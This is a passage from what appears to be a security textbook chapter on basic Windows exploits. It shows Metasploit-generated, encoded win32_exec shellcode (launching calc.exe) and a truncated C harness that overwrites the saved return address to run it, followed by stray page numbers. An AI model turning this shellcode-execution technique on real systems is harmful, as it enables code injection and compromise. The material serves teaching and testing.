exe and click Generate Payload. Figure 11-3 shows what the
web page should look like before clicking Generate Payload.
On the resulting page, copy the C-formatted shellcode (the first set of shellcode) into
the test program you built in Chapter 7 to exercise the shellcode:
C:\grayhat>type shellcode.c
/* win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub
#http://metasploit.com */
unsigned char scode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e"
"\x46\xd4\xd6\x83\xeb\xfc\xe2\xf4\xe2\xae\x90\xd6\x1e\x46\x5f\x93"
"\x22\xcd\xa8\xd3\x66\x47\x3b\x5d\x51\x5e\x5f\x89\x3e\x47\x3f\x9f"
"\x95\x72\x5f\xd7\xf0\x77\x14\x4f\xb2\xc2\x14\xa2\x19\x87\x1e\xdb"
Chapter 11: Basic Windows Exploits
261
PART III
"\x1f\x84\x3f\x22\x25\x12\xf0\xd2\x6b\xa3\x5f\x89\x3a\x47\x3f\xb0"
"\x95\x4a\x9f\x5d\x41\x5a\xd5\x3d\x95\x5a\x5f\xd7\xf5\xcf\x88\xf2"
"\x1a\x85\xe5\x16\x7a\xcd\x94\xe6\x9b\x86\xac\xda\x95\x06\xd8\x5d"
"\x6e\x5a\x79\x5d\x76\x4e\x3f\xdf\x95\xc6\x64\xd6\x1e\x46\x5f\xbe"
"\x22\x19\xe5\x20\x7e\x10\x5d\x2e\x9d\x86\xaf\x86\x76\xb6\x5e\xd2"
"\x41\x2e\x4c\x28\x94\x48\x83\x29\xf9\x25\xb5\xba\x7d\x68\xb1\xae"
"\x7b\x46\xd4\xd6";
int main()
{
int *ret; // ret pointer for manipulating saved return
ret = (int *)&ret + 2; // set ret to point to the saved return
// value on the stack.
Pages:
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481